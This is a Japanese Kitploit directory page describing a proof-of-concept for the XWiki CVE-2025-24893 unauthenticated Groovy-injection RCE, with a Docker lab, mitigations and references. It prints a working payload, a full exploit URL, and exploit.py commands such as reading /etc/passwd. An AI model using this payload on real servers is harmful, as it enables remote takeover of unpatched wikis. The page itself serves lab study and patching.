Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
xwiki-cve-2025-24893 — XWiki SolrSearch (CVE-2025-24893) における Groovy インジェクションを介した、text パラメータを使用した認証不要のリモートコード実行エクスプロイト。Docker ベースのラボ環境と PoC スクリプト付き。 | Kitploit
ツール/GitHubGitHub/endusdksla/xwiki-cve-2025-24893
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubendusdksla/xwiki-cve-2025-24893

xwiki-cve-2025-24893

XWiki SolrSearch (CVE-2025-24893) における Groovy インジェクションを介した、text パラメータを使用した認証不要のリモートコード実行エクスプロイト。Docker ベースのラボ環境と PoC スクリプト付き。

リポジトリを見る
92ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

XWiki SolrSearch の認証不要 RCE (CVE-2025-24893)


貢献者

  • ホワイトハットスクール4期25クラス イム・ドゥヨン(@endusdksla)

概要

  • XWikiはウィキ構文とマクロをサーバー側で解釈してレンダリングします。問題は、Main.SolrSearchページがゲストに公開されているにもかかわらず、ユーザー入力であるtextパラメータを十分な検証なしにXWiki構文として評価することです。
  • 攻撃者はtextに{{groovy}}マクロを挿入することで、サーバー上で任意のGroovyコードを実行でき、"command".execute()を介してOSコマンドも呼び出すことができます。この脆弱性は、追加のログインやトークンなしで、単一のGETリクエストだけで悪用可能です。

環境構成

このディレクトリは、公式XWikiスタンドアロン配布物15.10.1とJava 17ランタイムを使用して脆弱な環境を構成します。

項目内容
CVECVE-2025-24893
製品XWiki Platform
脆弱バージョン>= 5.3-milestone-2, < 15.10.11 / >= 16.0.0-rc-1, < 16.4.1
パッチバージョン15.10.11, 16.4.1
脆弱性タイプEval Injection -> Unauthenticated RCE
認証の要否不要
影響サーバーコマンド実行可能

脆弱性の条件

  • XWikiのバージョンがパッチ適用前のバージョンである必要がある。
  • Main.SolrSearchエンドポイントがゲストアクセス可能である必要がある。
  • サーバーがtextパラメータをXWiki構文として評価できる必要がある。
  • groovyマクロが実行可能な状態である必要がある。

本環境はXWiki 15.10.1を使用しているため、上記の条件を満たしています。

再現手順

root@kitploit:~
docker compose up -d --build

初回実行時は自動インストールが行われるため、数分かかる場合があります(所要時間は約6〜7分)。

root@kitploit:~
docker compose ps
docker inspect -f '{{json .State.Health}}' xwiki-web

上記のコマンド結果で"Status":"healthy"の状態になれば、環境の構成が完了し、exploitが可能な状態になります。

root@kitploit:~
pip install requests

exploit.py実行前に依存関係をインストールします。

PoCコード

核心ペイロードは以下の通りです。

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("id".execute().text){{/groovy}}{{/async}}

上記ペイロードはtextパラメータに挿入され、Main.SolrSearchページで評価されます。その結果、println("id".execute().text)がサーバー上で実行され、コマンド実行結果がRSSレスポンスボディに反映されます。

完全な実行スクリプトはexploit.pyを参照してください。

root@kitploit:~
python3 exploit.py

上記のPythonコードの実行によりPoCの再現が可能です。デフォルトのコマンドはidです。

root@kitploit:~
python3 exploit.py -c "cat /etc/passwd"

別のコマンドを実行するには、上記のように引数を渡してください。

または、URLでリクエストを送信することもできます(idを出力するペイロード)。

root@kitploit:~
http://localhost:1337/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync+async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22id%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

実行結果

poc_id idを応答として返している様子

poc_ls 現在のディレクトリのファイル確認

対策

  • XWikiを15.10.11以上または16.4.1以上にアップデートする。
  • 外部に公開されているXWikiインスタンスのゲストアクセスポリシーを確認する。
  • 不要なスクリプト/マクロの実行権限を最小化する。
  • 不審なリクエストおよびSolrSearchアクセスログを監視する。

参考情報

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  • GitHub Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j
ツールをダウンロード